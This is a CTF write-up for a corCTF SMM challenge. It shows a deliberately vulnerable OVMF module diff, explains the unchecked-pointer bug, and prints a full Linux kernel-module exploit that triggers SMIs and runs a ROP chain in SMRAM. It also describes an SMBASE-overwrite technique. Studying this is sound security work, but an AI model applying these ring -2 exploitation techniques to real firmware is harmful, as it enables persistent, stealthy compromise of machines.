diff --git a/OvmfPkg/OvmfPkg.dec b/OvmfPkg/OvmfPkg.dec
index 8c20480..acdb900 100644
--- a/OvmfPkg/OvmfPkg.dec
+++ b/OvmfPkg/OvmfPkg.dec
@@ -172,6 +172,7 @@
   gQemuAcpiTableNotifyProtocolGuid = {0x928939b2, 0x4235, 0x462f, {0x95, 0x80, 0xf6, 0xa2, 0xb2, 0xc2, 0x1a, 0x4f}}
   gEfiMpInitLibMpDepProtocolGuid = {0xbb00a5ca, 0x8ce, 0x462f, {0xa5, 0x37, 0x43, 0xc7, 0x4a, 0x82, 0x5c, 0xa4}}
   gEfiMpInitLibUpDepProtocolGuid = {0xa9e7cef1, 0x5682, 0x42cc, {0xb1, 0x23, 0x99, 0x30, 0x97, 0x3f, 0x4a, 0x9f}}
+  gEfiSmmCorctfProtocolGuid = {0xb888a84d, 0x3888, 0x480e, {0x95, 0x83, 0x81, 0x37, 0x25, 0xfd, 0x39, 0x8b}}
 
 [PcdsFixedAtBuild]
   gUefiOvmfPkgTokenSpaceGuid.PcdOvmfPeiMemFvBase|0x0|UINT32|0
diff --git a/OvmfPkg/OvmfPkgX64.dsc b/OvmfPkg/OvmfPkgX64.dsc
index 1448f92..fe4e828 100644
--- a/OvmfPkg/OvmfPkgX64.dsc
+++ b/OvmfPkg/OvmfPkgX64.dsc
@@ -697,7 +697,9 @@
 ################################################################################
 [Components]
   OvmfPkg/ResetVector/ResetVector.inf
-
+!if $(SMM_REQUIRE) == TRUE
+  OvmfPkg/Corctf/Corctf.inf
+!endif
   #
   # SEC Phase modules
   #
diff --git a/OvmfPkg/OvmfPkgX64.fdf b/OvmfPkg/OvmfPkgX64.fdf
index 438806f..55e1b9e 100644
--- a/OvmfPkg/OvmfPkgX64.fdf
+++ b/OvmfPkg/OvmfPkgX64.fdf
@@ -380,7 +380,7 @@ INF OvmfPkg/CpuHotplugSmm/CpuHotplugSmm.inf
 INF UefiCpuPkg/CpuIo2Smm/CpuIo2Smm.inf
 INF MdeModulePkg/Universal/LockBox/SmmLockBox/SmmLockBox.inf
 INF UefiCpuPkg/PiSmmCpuDxeSmm/PiSmmCpuDxeSmm.inf
-
+INF OvmfPkg/Corctf/Corctf.inf
 #
 # Variable driver stack (SMM)
 #
```

Before discussing the bug, it is important to give a high-level overview of SMM; I learned a lot of what I know from this slideshow and this post. SMM (System Management Mode), often called ring -2, is the second most privileged ring on x86_64 (only ring -3 is more privileged). Its intended use case is vital or sensitive firmware that should run uninterrupted at high privileges. When a system enters SMM, all cores enter SMM to prevent potential race conditions on SMT systems... which also explains why frequent SMM transitions are known to cause performance degradation.

One common way to trigger entry is a software SMI (System Management Interrupt), raised by writing to IO port 0xb2. The processor then executes the SMM entry point, located at an offset from the SMBASE register, and saves the current processor state at another offset from SMBASE so it can be restored later when leaving SMM with the rsm instruction. The code here starts off executing in real mode (so physical addresses!), but identity paging is often set up, usually as read-write-execute (although not in the case of current upstream OVMF).
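For reference, the offsets involved can be written as a tiny C sketch. The constants are an assumption based on EDK2’s `SMM_HANDLER_OFFSET` (0x8000) and `SMRAM_SAVE_STATE_MAP_OFFSET` (0xfc00) and on the SMBASE field sitting at offset 0x7f00 of Intel’s 64-bit save-state map (relative to SMBASE + 0x8000); please verify them against the SDM for your CPU. The helper names are hypothetical.

```c
#include <stdint.h>

/* Offsets relative to SMBASE (assumed, see lead-in). */
#define SMM_HANDLER_OFFSET          0x8000u /* SMI entry point                          */
#define SMRAM_SAVE_STATE_MAP_OFFSET 0xfc00u /* start of the 64-bit save-state area      */
#define SAVE_STATE_SMBASE_FIELD     0xff00u /* 0x8000 + 0x7f00: SMBASE, reloaded by rsm */

static uint64_t smi_entry_point(uint64_t smbase)   { return smbase + SMM_HANDLER_OFFSET; }
static uint64_t save_state_start(uint64_t smbase)  { return smbase + SMRAM_SAVE_STATE_MAP_OFFSET; }
static uint64_t smbase_field_addr(uint64_t smbase) { return smbase + SAVE_STATE_SMBASE_FIELD; }
```

With the reset-default SMBASE of 0x30000, this gives an entry point at 0x38000 and a save-state area starting at 0x3fc00, which falls inside the first SMRAM region listed later in this writeup. Because rsm reloads SMBASE from the save-state area, that field is also what an SMBASE-relocation attack would go after.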

Generally, the code and data of SMM handlers should be constrained to SMRAM. Intel chipsets provide an SMRAMC register with a D_OPEN bit, which when unset hides SMRAM from non-SMM contexts, and a D_LCK bit to prevent tampering with that setting (this bit can only be cleared with a system reset). Modern chips also have a TSEG region, which you can just think of as extra SMRAM.
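As an illustration, decoding an SMRAMC value might look like the following. The bit positions are an assumption taken from the Q35/MCH host bridge that QEMU emulates (the SMRAM register at PCI config offset 0x9d in QEMU’s `q35.h`). Other chipsets may differ, and actually reading the byte from PCI config space is left out. All names here are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed SMRAM control register bits (Q35/MCH layout as modelled by QEMU). */
#define SMRAM_D_OPEN     (1u << 6) /* SMRAM visible to non-SMM accesses     */
#define SMRAM_D_LCK      (1u << 4) /* lock: D_OPEN can't be changed until reset */
#define SMRAM_G_SMRAME   (1u << 3) /* SMRAM enabled                         */
#define SMRAM_C_BASE_SEG 0x7u      /* compatible SMRAM base segment field   */

struct smramc {
    bool open;
    bool locked;
    bool enabled;
    unsigned base_seg;
};

static struct smramc decode_smramc(uint8_t v)
{
    struct smramc s = {
        .open = (v & SMRAM_D_OPEN) != 0,
        .locked = (v & SMRAM_D_LCK) != 0,
        .enabled = (v & SMRAM_G_SMRAME) != 0,
        .base_seg = v & SMRAM_C_BASE_SEG,
    };
    return s;
}

/* SMRAM is only hidden and tamper-proof if it is enabled, closed and locked. */
static bool smram_is_sealed(uint8_t v)
{
    struct smramc s = decode_smramc(v);
    return s.enabled && !s.open && s.locked;
}
```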

There is plenty more to SMM and possible security pitfalls, but that is beyond the scope of this writeup. If you are curious to see some of the other links I read up on, I linked them at the end of this writeup.

The bug in the above patch is a classic SMM firmware bug: a pointer passed in via the communication buffer for result output (Dest in DUMP_NOTES) isn’t checked to be outside of SMRAM. Since DumpNotes copies the whole Book array, whose contents we control through ADD_NOTE, to that pointer, this effectively becomes an arbitrary write. Since SMM in OVMF (and I presume in almost all UEFI firmware) does not have ASLR, we can simply target the stack and ROP in ring -2. The flag itself is located in SMRAM, so it is only accessible from ring -2 in the first place.

A custom QEMU build from commit f7f686b61cf7ee142c9264d2e04ac2c6a96d37f8 was also provided. Standard distro QEMU builds (which were usually older versions) seemed to have trouble with SMM, at least when interacting with it from ring 0 (and in general, QEMU’s SMM emulation seems to have some quirks that differ from real hardware). KVM was also disabled, as attempting to debug with a gdb remote server caused both gdb and the QEMU instance to crash for me.

The user was booted into an Ubuntu linux-hwe-5.15-headers-5.15.0-73 kernel as the root user. When checking the memory tree in QEMU monitor mode with info mtree, we see SMRAM-relevant regions at 0000000000030000-000000000004ffff, 00000000000a0000-00000000000bffff, and 000000007f000000-000000007fffffff (the last of which is denoted TSEG and is where most of the OVMF SMM modules seem to be located). Both the first and third regions read as 0xff bytes when accessed outside of SMM, while the middle one is all nulls (which I believe is treated as the VGA buffer when not in SMM). So even as root, the player has no way of retrieving the flag embedded in the buggy SMM module.
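Conceptually, the check missing from DUMP_NOTES is just a range-overlap test. The sketch below hard-codes the three SMRAM ranges listed above purely for illustration; real EDK2 code would typically call `SmmIsBufferOutsideSmmValid()` from SmmMemLib instead. The function name `buffer_outside_smram` is hypothetical, and this sketch additionally rejects empty buffers.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* SMRAM ranges from "info mtree" (inclusive ends); challenge VM only. */
struct range { uint64_t start, end; };
static const struct range smram[] = {
    { 0x00030000ull, 0x0004ffffull },
    { 0x000a0000ull, 0x000bffffull },
    { 0x7f000000ull, 0x7fffffffull }, /* TSEG */
};

/* Simplified model of the missing validation: reject empty or wrapping
 * buffers and any buffer that overlaps an SMRAM range. */
static bool buffer_outside_smram(uint64_t addr, uint64_t len)
{
    if (len == 0 || addr + len - 1 < addr) /* empty, or wraps past 2^64 */
        return false;
    uint64_t last = addr + len - 1;
    for (size_t i = 0; i < sizeof(smram) / sizeof(smram[0]); i++)
        if (addr <= smram[i].end && last >= smram[i].start)
            return false;                  /* overlaps SMRAM */
    return true;
}
```

The exploit’s DUMP_NOTES destination, `0x7ffb6ae8` with `sizeof(Book)` = 320 bytes, falls inside TSEG and would be rejected, while the CommBuffer at `0x7E9EF000` passes. In the handler itself, a fix along these lines would be a call such as `SmmIsBufferOutsideSmmValid((EFI_PHYSICAL_ADDRESS)(UINTN)CommData->Data.Dest, sizeof(Book))` before `DumpNotes`, jumping to `Failure` when it returns FALSE.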

The bug by itself is quite simple to exploit, and I also provided players with debug builds of all the OVMF firmware’s internal module binaries. Any experienced pwner can easily find ROP gadgets in those to copy the flag out of SMRAM to somewhere accessible from ring 0. The main question now is how to communicate with this specific corctf SMM module from the kernel, given its GUID in the diff above.

This took me a while to figure out, but binarly.io repeatedly mentioned a tool known as ChipSec for sending payloads from ring 0 to ring -2. I took a look at how this functionality works: it simply scans memory for the header of the gSmmCorePrivate struct and then replicates how a UEFI DXE service would trigger and communicate with a specific SMM handler. It does this by writing the CommBuffer pointer (the buffer begins with the target handler’s GUID) along with some size metadata into that struct, and then writing 0 to IO ports 0xB2 and 0xB3 to trigger the software SMI. Note that OVMF checks that the CommBuffer comes from a specific region of memory, in addition to checking that it does not overlap with SMRAM here.
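The CommBuffer layout the SMM core expects is EDK2’s `EFI_SMM_COMMUNICATE_HEADER`: a GUID, a `UINTN MessageLength`, and then the handler’s data. Below is a userland-testable sketch of building it, closely mirroring the layout `trigger_vuln_smi()` writes in the driver below. The type and function names are hypothetical stand-ins for the EDK2 definitions, assuming x86-64, where `UINTN` is 8 bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Userland mirrors of EDK2's EFI_GUID and EFI_SMM_COMMUNICATE_HEADER. */
typedef struct {
    uint32_t Data1;
    uint16_t Data2;
    uint16_t Data3;
    uint8_t  Data4[8];
} efi_guid;

typedef struct {
    efi_guid HeaderGuid;    /* selects the SMI handler         */
    uint64_t MessageLength; /* size of Data[]                  */
    uint8_t  Data[];        /* handler payload (its CommBuffer) */
} smm_communicate_header;

/* Lay out header + payload in buf and return the total size, i.e. the value
 * that goes into gSmmCorePrivate's BufferSize. Returns 0 if buf is too small.
 * memcpy is used so buf needs no particular alignment. */
static size_t build_comm_buffer(uint8_t *buf, size_t buf_len, const efi_guid *guid,
                                const void *payload, uint64_t payload_len)
{
    size_t total = offsetof(smm_communicate_header, Data) + payload_len;
    if (payload_len > buf_len || total > buf_len)
        return 0;
    memcpy(buf, guid, sizeof(*guid));
    memcpy(buf + offsetof(smm_communicate_header, MessageLength),
           &payload_len, sizeof(payload_len));
    memcpy(buf + offsetof(smm_communicate_header, Data), payload, payload_len);
    return total;
}
```

For the 24-byte COMM_DATA payload used in this challenge, the total comes out to 16 + 8 + 24 = 48 bytes, which is the value written into gSmmCorePrivate’s BufferSize.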

By default, the location of gSmmCorePrivate can’t be reached from the kernel, even through physmap, as the BIOS marks it as reserved during boot (according to the dmesg logs). But this is easily solved with ioremap, which maps in the physical address.

With all the above information, we can now write an exploit! I wrote the following driver to exploit the SMM handler:

#include <asm/msr.h>
#include <asm/io.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/mm.h>
#include <linux/pgtable.h>
#include <linux/slab.h>

MODULE_AUTHOR("FizzBuzz101");
MODULE_DESCRIPTION("Pwning SMM");
MODULE_LICENSE("GPL");

/* Print the SMI counter MSR so we can confirm an SMI actually fired. */
void log_smis(void)
{
    uint64_t val = 0;
    rdmsrl(MSR_SMI_COUNT, val);
    printk(KERN_INFO "SMI_COUNT: 0x%llx\n", val);
}

/* Raise a software SMI by writing to the APM control port (0xb2). */
void trigger_smi(void)
{
    log_smis();
    asm volatile(
        ".intel_syntax noprefix;"
        "xor eax, eax;"
        "out 0xb3, eax;"
        "out 0xb2, eax;"
        ".att_syntax;"
        :::"rax");
    log_smis();
}

typedef struct {
    uint32_t Data1;
    uint16_t Data2;
    uint16_t Data3;
    uint8_t  Data4[8];
} EFI_GUID;

#define START_MAP      0x000000007e8ef000ull
#define END_MAP        0x000000007eaef000ull
#define SMMC_PHYS_ADDR 0x000000007EACF380ull
#define COMM_BUFFER    0x7E9EF000ull
// [ 0.000000] BIOS-e820: [mem 0x000000007e8ef000-0x000000007eb6efff] reserved

void *reserved;
void *smmc;
void *comm_buffer;

EFI_GUID target_smi_guid = {0xb888a84d, 0x3888, 0x480e, {0x95, 0x83, 0x81, 0x37, 0x25, 0xfd, 0x39, 0x8b}};

/* Map the SMM Core private data ("smmc") and the comm buffer, both of which
 * sit in the e820-reserved range and are therefore mappable from the OS. */
void map_reserved(void)
{
    // locally, smmc is at 0x000000007EACF380
    reserved = ioremap(SMMC_PHYS_ADDR & ~(0xfffull), PAGE_SIZE);
    smmc = reserved + (SMMC_PHYS_ADDR & 0xfffull);
    printk(KERN_INFO "mapped in virtual address of reserved UEFI region: 0x%lx\n", (unsigned long)reserved);
    printk(KERN_INFO "new SMMC virtual address: 0x%lx\n", (unsigned long)smmc);
    comm_buffer = ioremap(COMM_BUFFER, PAGE_SIZE);
    printk(KERN_INFO "mapped in virtual address of UEFI Comm Buffer: 0x%lx\n", (unsigned long)comm_buffer);
}

void unmap_reserved(void)
{
    iounmap(reserved);
    iounmap(comm_buffer);
}

#define PAYLOAD_MAX_SZ 0x100

/* Build an EFI_SMM_COMMUNICATE_HEADER (GUID, MessageLength, payload) in the
 * comm buffer, point the SMM Core's CommunicationBuffer and BufferSize fields
 * (offsets 56 and 64 of its private data) at it, then raise the SMI. */
void trigger_vuln_smi(void *data, uint64_t size)
{
    void *commbuffer_off = smmc + 56;
    void *commbuffersz_off = smmc + 64;
    uint64_t final_sz = sizeof(target_smi_guid) + sizeof(size) + size;

    memcpy(comm_buffer, &target_smi_guid, sizeof(target_smi_guid));
    memcpy(comm_buffer + sizeof(target_smi_guid), &size, sizeof(size)); // MessageLength
    memcpy(comm_buffer + sizeof(target_smi_guid) + sizeof(size), data, size);
    writeq(COMM_BUFFER, commbuffer_off);
    writeq(final_sz, commbuffersz_off);
    trigger_smi();
}

#define ADD_NOTE   0x1337
#define GET_NOTE   0x1338
#define DUMP_NOTES 0x31337

typedef __uint128_t DIARY_NOTE;
typedef uint32_t UINT32;
typedef uint8_t UINT8;

typedef struct {
    UINT32 Cmd;
    UINT32 Idx;
    union TRANSFER_DATA {
        DIARY_NOTE Note;
        UINT8 *Dest;
    } Data;
} __attribute__((packed)) COMM_DATA;

/* ADD_NOTE: store one 16-byte note at index idx. */
void send_key(__uint128_t note, uint32_t idx)
{
    COMM_DATA data = {0};
    data.Cmd = ADD_NOTE;
    data.Idx = idx;
    data.Data.Note = note;
    trigger_vuln_smi(&data, sizeof(data));
}

/* Pack two 8-byte ROP chain entries into one note (gadget1 is the low half). */
void send_gadget(uint64_t gadget1, uint64_t gadget2, uint32_t idx)
{
    __uint128_t note = gadget1 | ((__uint128_t)(gadget2) << 64);
    send_key(note, idx);
}

/* DUMP_NOTES: ask the handler to copy the stored notes to Dest. */
void dump_all_notes(phys_addr_t addr)
{
    COMM_DATA data = {0};
    data.Cmd = DUMP_NOTES;
    data.Data.Dest = (UINT8 *)(uintptr_t)addr;
    trigger_vuln_smi(&data, sizeof(data));
}

// get SMM Driver load addresses from debug log, and break to get return address
#define PiSmmCpuDxeSmmBase 0x0007FFBF000ull
#define PiSmmCoreBase      0x000000007FFEF000ull
#define CorCtfSmmBase      0x0007FF9C000ull
#define DumpHere           COMM_BUFFER

uint64_t pop_rcx_rbp     = PiSmmCpuDxeSmmBase + 0x0001044d; //: pop rcx ; pop rbx ; ret ;
uint64_t pop_rax_rbx     = PiSmmCpuDxeSmmBase + 0x000105dc; //: pop rax ; pop rbx ; ret ;
uint64_t mov_ptr_rcx_rax = PiSmmCpuDxeSmmBase + 0x0000fee5; //: mov qword [rcx], rax ; ret ;
uint64_t load_rax_gadget = PiSmmCoreBase + 0x0000110f;      // : mov rax, qword [rdi] ; sub rsi, rdx ; add rax, rsi ; ret ;
uint64_t pop_rdx_rsi_rdi = PiSmmCoreBase + 0x000019cd;      // : pop rdx ; pop rsi ; pop rdi ; ret ;
uint64_t pop_rdi         = PiSmmCoreBase + 0x000019cd + 2;  // : pop rdi ; ret ;
uint64_t ropnop          = PiSmmCoreBase + 0x000019cd + 3;  // : ret ;
uint64_t rsm             = PiSmmCpuDxeSmmBase + 0x000fe89;  // : rsm
uint64_t flag_addr       = CorCtfSmmBase + 0x0002bbc;

static int init_exploit(void)
{
    printk(KERN_INFO "beginning exploit\n");
    map_reserved();

    /* Each note holds two chain qwords (low, high). The chain repeatedly sets
     * rdi = flag_addr + n and loads rax = [rdi] (rsi and rdx stay 0, so the
     * sub/add in load_rax_gadget are no-ops), stores rax to DumpHere + n,
     * and finally executes rsm to leave SMM cleanly. */
    send_gadget(pop_rdx_rsi_rdi, 0, 0);
    send_gadget(0, flag_addr, 1);
    send_gadget(load_rax_gadget, pop_rcx_rbp, 2);
    send_gadget(DumpHere, 0, 3);
    send_gadget(mov_ptr_rcx_rax, ropnop, 4);
    send_gadget(pop_rdi, flag_addr + 8, 5);
    send_gadget(load_rax_gadget, pop_rcx_rbp, 6);
    send_gadget(pop_rdi, flag_addr + 8, 7);
    send_gadget(load_rax_gadget, pop_rcx_rbp, 8);
    send_gadget(DumpHere + 8, 0, 9);
    send_gadget(mov_ptr_rcx_rax, ropnop, 10);
    send_gadget(pop_rdi, flag_addr + 16, 11);
    send_gadget(load_rax_gadget, pop_rcx_rbp, 12);
    send_gadget(DumpHere + 16, 0, 13);
    send_gadget(mov_ptr_rcx_rax, ropnop, 14);
    send_gadget(pop_rdi, flag_addr + 24, 15);
    send_gadget(load_rax_gadget, pop_rcx_rbp, 16);
    send_gadget(DumpHere + 24, 0, 17);
    send_gadget(mov_ptr_rcx_rax, ropnop, 18);
    send_gadget(rsm, 0, 19);

    /* Dump the notes (the chain) over the SMM stack slot found while debugging. */
    dump_all_notes(0x7ffb6ae8);
    printk(KERN_INFO "found SMM flag: %s\n", (char *)comm_buffer);
    return 0;
}

static void cleanup_exploit(void)
{
    unmap_reserved();
    printk(KERN_INFO "leaving exploit\n");
}

module_init(init_exploit);
module_exit(cleanup_exploit);
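The magic offsets in trigger_vuln_smi() and the note packing in send_gadget() can be sanity-checked on the host. The sketch below is a minimal, hedged version of that check. It assumes EDK2's SMM_CORE_PRIVATE_DATA layout on x64 (SMM_CORE_PRIVATE_SKETCH and COMM_HEADER_SKETCH are my own hypothetical mirrors of the EDK2 structures, not the real headers), an LP64 host, and a GCC or Clang compiler that supports `__uint128_t`:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the first fields of EDK2's SMM_CORE_PRIVATE_DATA
 * on x64: UINTN and pointers are 8 bytes, BOOLEAN is 1 byte. */
typedef struct {
    uint64_t Signature;
    uint64_t SmmIplImageHandle;
    uint64_t SmramRangeCount;
    uint64_t SmramRanges;
    uint64_t SmmEntryPoint;
    uint8_t  SmmEntryPointRegistered;
    uint8_t  InSmm;
    uint64_t Smst;                /* padded up to offset 48 */
    uint64_t CommunicationBuffer; /* the module writes COMM_BUFFER here */
    uint64_t BufferSize;          /* the module writes final_sz here */
    uint64_t ReturnStatus;
} SMM_CORE_PRIVATE_SKETCH;

/* EFI_SMM_COMMUNICATE_HEADER: GUID, UINTN MessageLength, then the payload. */
typedef struct {
    uint8_t  HeaderGuid[16];
    uint64_t MessageLength;
    uint8_t  Data[];
} COMM_HEADER_SKETCH;

/* Same packed layout as COMM_DATA in the module. */
typedef struct {
    uint32_t Cmd;
    uint32_t Idx;
    union {
        __uint128_t Note;
        uint8_t *Dest;
    } Data;
} __attribute__((packed)) COMM_DATA;

/* Fail the build if the assumed layout disagrees with smmc + 56 / smmc + 64. */
_Static_assert(offsetof(SMM_CORE_PRIVATE_SKETCH, CommunicationBuffer) == 56, "CommunicationBuffer");
_Static_assert(offsetof(SMM_CORE_PRIVATE_SKETCH, BufferSize) == 64, "BufferSize");
_Static_assert(sizeof(COMM_DATA) == 24, "COMM_DATA is 4 + 4 + 16 bytes");

/* Total bytes placed in the comm buffer, i.e. final_sz in trigger_vuln_smi(). */
static inline uint64_t comm_total_size(uint64_t payload_size)
{
    return offsetof(COMM_HEADER_SKETCH, Data) + payload_size;
}

/* As in send_gadget(): chain entry 2*i is the low half of note i, 2*i+1 the high half. */
static inline __uint128_t pack_note(uint64_t lo, uint64_t hi)
{
    return (__uint128_t)lo | ((__uint128_t)hi << 64);
}
```

If the assumed layout were off, the `_Static_assert`s would stop the build instead of silently disagreeing with the 56 and 64 hardcoded in the module. With a 24-byte COMM_DATA, comm_total_size() gives 48 bytes, matching 16 (GUID) + 8 (MessageLength) + 24 (payload).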

Running the exploit results in:

Ring -2 has been pwned!

Overall, SMM is quite an interesting target for exploitation and potential backdoors, especially given how high its privileges are. During the CTF, 7 teams managed to solve this, which was around what I expected for a medium challenge in corCTF’s pwn category. I must mention that zhuyifei1999 used an interesting strategy, one I have heard of in real-world SMM exploits, that avoided ROP entirely: he overwrote SMBASE to point outside SMRAM and thereby took control of the SMI entry point (but then had to deal with the pain of transitioning from 16-bit to 32-bit mode, since SMM entry begins in a 16-bit, real-mode-like state).
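The SMBASE trick boils down to simple address arithmetic. Below is a minimal sketch, assuming the Intel SDM's SMRAM layout for Intel 64 processors (the macro and function names are my own, hypothetical ones, and other vendors may use a different save-state layout). On an SMI, the CPU starts executing at SMBASE + 0x8000 and saves state near the top of the 64 KiB window. On RSM, it reloads SMBASE from a slot in that save area, which is the same mechanism firmware uses to relocate SMBASE per CPU. This only illustrates the arithmetic and is not zhuyifei1999's actual exploit.

```c
#include <assert.h>
#include <stdint.h>

/* Offsets assumed from the Intel SDM's SMRAM state save map for Intel 64
 * processors; other vendors may differ. */
#define SMI_ENTRY_OFFSET    0x8000u  /* SMI handler starts at SMBASE + 0x8000 */
#define SAVE_STATE_OFFSET   0xFE00u  /* save map spans SMBASE + 0xFE00..0xFFFF */
#define SMBASE_FIELD_OFFSET 0x7EF8u  /* SMBASE slot, relative to SMBASE + 0x8000 */
#define DEFAULT_SMBASE      0x30000u /* SMBASE value after reset */

/* Where the CPU begins executing (16-bit, real-mode-like) on an SMI. */
static inline uint32_t smi_entry_point(uint32_t smbase)
{
    return smbase + SMI_ENTRY_OFFSET;
}

/* Start of the state save area written on SMI and read back on RSM. */
static inline uint32_t save_state_base(uint32_t smbase)
{
    return smbase + SAVE_STATE_OFFSET;
}

/* Address of the saved SMBASE: whatever value sits here when RSM executes
 * becomes the SMBASE used for the next SMI on that CPU. */
static inline uint32_t smbase_field_addr(uint32_t smbase)
{
    return smbase + SMI_ENTRY_OFFSET + SMBASE_FIELD_OFFSET;
}
```

With the post-reset SMBASE of 0x30000, the entry point is 0x38000 and the saved SMBASE sits at 0x3FEF8. If that slot holds an address outside SMRAM when RSM runs, the next SMI begins executing at that address plus 0x8000, in memory the attacker controls.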

As promised, here are some other interesting SMM links I read through while making this challenge:

https://www.welivesecurity.com/2022/04/19/when-secure-isnt-secure-uefi-vulnerabilities-lenovo-consumer-laptops/

https://dreamlayers.blogspot.com/2012/10/dumping-smram.html

http://blog.cr4.sh/2015/07/building-reliable-smm-backdoor-for-uefi.html

https://bostonglobalforum.org/cyber/overall/exploiting-smm-callout-vulnerabilities-in-lenovo-firmware/

https://www.synacktiv.com/en/publications/through-the-smm-class-and-a-vulnerability-found-there

https://hardwear.io/netherlands-2021/presentation/automated-vulnerability-hunting-in-SMM.pdf

https://research.nccgroup.com/2023/03/15/a-race-to-report-a-toctou-analysis-of-a-bug-collision-in-intel-smm/

https://research.nccgroup.com/2023/04/11/stepping-insyde-system-management-mode/

https://dannyodler.medium.com/attacking-the-golden-ring-on-amd-mini-pc-b7bfb217b437

Feel free to point out any mistakes or ask questions about this writeup!